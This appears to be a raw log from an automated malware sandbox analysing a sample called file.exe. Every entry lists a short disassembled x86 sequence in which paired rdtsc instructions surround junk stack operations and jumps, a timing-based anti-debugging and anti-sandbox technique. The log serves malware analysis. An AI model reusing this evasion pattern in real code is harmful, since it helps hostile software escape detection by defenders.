Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC011E second address: 4DC012B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC012B second address: 4DC014B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D814h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC014B second address: 4DC014F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC014F second address: 4DC0155 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0CB6 second address: 4DA0CC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9278BE282Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0CC9 second address: 4DA0D0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F927881D814h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov bx, ax 0x00000013 mov ebx, ecx 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007F927881D814h 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0D0B second address: 4DA0D0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0D0F second address: 4DA0D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0D15 second address: 4DA0D1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0459 second address: 4DF04A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F927881D80Fh 0x00000009 and ax, 9B9Eh 0x0000000e jmp 00007F927881D819h 0x00000013 popfd 0x00000014 call 00007F927881D810h 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push ebx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 mov di, ax 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF04A6 second address: 4DF04B9 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 mov ecx, ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF04B9 second address: 4DF04DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 call 00007F927881D810h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF04DC second address: 4DF04E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF04E0 second address: 4DF04E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80174 second address: 4D8019A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2831h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9278BE282Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D8019A second address: 4D801B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D811h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D801B6 second address: 4D801CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop ecx 0x00000010 mov edi, 579BE08Ah 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D801CC second address: 4D801E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F927881D817h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D8022B second address: 4D8022F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D8022F second address: 4D80235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA09ED second address: 4DA0A01 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 5A79A209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, edx 0x00000011 push edx 0x00000012 pop esi 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA05CE second address: 4DA05D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA04E5 second address: 4DA04E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA04E9 second address: 4DA0564 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F927881D816h 0x00000008 jmp 00007F927881D815h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushad 0x00000014 mov ah, FCh 0x00000016 mov ebx, 48DF627Ah 0x0000001b popad 0x0000001c pushfd 0x0000001d jmp 00007F927881D80Bh 0x00000022 add eax, 2D337E1Eh 0x00000028 jmp 00007F927881D819h 0x0000002d popfd 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F927881D80Dh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0280 second address: 4DA0294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9278BE2830h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0294 second address: 4DA0298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB00F7 second address: 4DB00FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB00FD second address: 4DB0123 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, 0Ah 0x00000005 mov di, 833Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F927881D817h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0123 second address: 4DB015C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F9278BE282Fh 0x00000008 pop eax 0x00000009 call 00007F9278BE2839h 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB015C second address: 4DB0174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D814h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0174 second address: 4DB01A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE282Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F9278BE2836h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB01A2 second address: 4DB01A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB01A6 second address: 4DB01AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF03DE second address: 4DF03E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF03E4 second address: 4DF042C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE282Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov edi, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F9278BE2838h 0x00000016 jmp 00007F9278BE2835h 0x0000001b popfd 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0444 second address: 4DC0461 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D819h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0461 second address: 4DC0467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0467 second address: 4DC046B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC046B second address: 4DC04AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b jmp 00007F9278BE282Fh 0x00000010 and dword ptr [eax], 00000000h 0x00000013 jmp 00007F9278BE2836h 0x00000018 and dword ptr [eax+04h], 00000000h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov si, di 0x00000022 mov ebx, 62EE6F0Ch 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC04AE second address: 4DC04C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F927881D811h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0423 second address: 4DA0484 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9278BE2836h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F9278BE2830h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 mov esi, 0976128Dh 0x0000001c mov ah, 4Ah 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov esi, 7C5DB8FDh 0x00000028 pushfd 0x00000029 jmp 00007F9278BE282Ah 0x0000002e and cx, A5D8h 0x00000033 jmp 00007F9278BE282Bh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0054 second address: 4DC0058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0058 second address: 4DC005C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC005C second address: 4DC0062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0062 second address: 4DC006B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 9C51h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0279 second address: 4DC02AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D819h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 jmp 00007F927881D80Fh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC02AD second address: 4DC02C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9278BE2834h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC02C5 second address: 4DC0314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F927881D816h 0x00000011 mov ebp, esp 0x00000013 jmp 00007F927881D810h 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007F927881D80Dh 0x00000021 mov di, si 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0314 second address: 4DC0319 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0773 second address: 4DE077C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, 1E7Fh 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE077C second address: 4DE07A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2835h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9278BE282Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE07A5 second address: 4DE07F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F927881D816h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F927881D810h 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a jmp 00007F927881D80Dh 0x0000001f popad 0x00000020 xchg eax, ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F927881D80Dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE07F9 second address: 4DE07FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE07FF second address: 4DE0803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0803 second address: 4DE0807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0807 second address: 4DE0827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F927881D815h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0827 second address: 4DE082D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE082D second address: 4DE0878 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D813h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d popad 0x0000000e mov eax, dword ptr [778165FCh] 0x00000013 jmp 00007F927881D80Ch 0x00000018 test eax, eax 0x0000001a jmp 00007F927881D810h 0x0000001f je 00007F92EB1D0900h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0878 second address: 4DE0895 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0895 second address: 4DE08EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D811h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b pushad 0x0000000c movzx ecx, di 0x0000000f mov ax, di 0x00000012 popad 0x00000013 xor eax, dword ptr [ebp+08h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push edi 0x0000001a pop esi 0x0000001b pushfd 0x0000001c jmp 00007F927881D819h 0x00000021 adc si, AF86h 0x00000026 jmp 00007F927881D811h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE08EE second address: 4DE08F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE08F4 second address: 4DE08F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE09F1 second address: 4DE09F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE09F7 second address: 4DE09FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE09FB second address: 4DE0A77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ret 0x0000000c nop 0x0000000d push eax 0x0000000e call 00007F927CFA3245h 0x00000013 mov edi, edi 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F9278BE282Eh 0x0000001c add ax, 5DF8h 0x00000021 jmp 00007F9278BE282Bh 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F9278BE2838h 0x0000002d adc al, 00000058h 0x00000030 jmp 00007F9278BE282Bh 0x00000035 popfd 0x00000036 popad 0x00000037 xchg eax, ebp 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F9278BE2830h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0A77 second address: 4DE0A7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0A7D second address: 4DE0AD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 push eax 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F9278BE282Bh 0x00000012 sub si, 347Eh 0x00000017 jmp 00007F9278BE2839h 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F9278BE2838h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0AD0 second address: 4DE0AF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F927881D815h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0AF8 second address: 4DE0AFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DE0AFE second address: 4DE0B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9003C second address: 4D90060 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2831h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9278BE282Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90060 second address: 4D90066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90066 second address: 4D9006A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9006A second address: 4D90089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F927881D814h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90089 second address: 4D90150 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE282Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F9278BE2836h 0x00000010 and esp, FFFFFFF8h 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F9278BE282Eh 0x0000001a add ecx, 4977F118h 0x00000020 jmp 00007F9278BE282Bh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007F9278BE2838h 0x0000002c adc cl, 00000078h 0x0000002f jmp 00007F9278BE282Bh 0x00000034 popfd 0x00000035 popad 0x00000036 xchg eax, ecx 0x00000037 jmp 00007F9278BE2836h 0x0000003c push eax 0x0000003d jmp 00007F9278BE282Bh 0x00000042 xchg eax, ecx 0x00000043 jmp 00007F9278BE2836h 0x00000048 xchg eax, ebx 0x00000049 jmp 00007F9278BE2830h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90150 second address: 4D90154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90154 second address: 4D9015A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9015A second address: 4D90160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90160 second address: 4D9017E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2831h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9017E second address: 4D90182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90182 second address: 4D90195 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE282Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90195 second address: 4D901C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D819h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F927881D80Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D901C4 second address: 4D901CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D901CA second address: 4D901CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D901CE second address: 4D90207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F9278BE2834h 0x0000000e mov dword ptr [esp], esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9278BE2837h 0x00000018 rdtsc
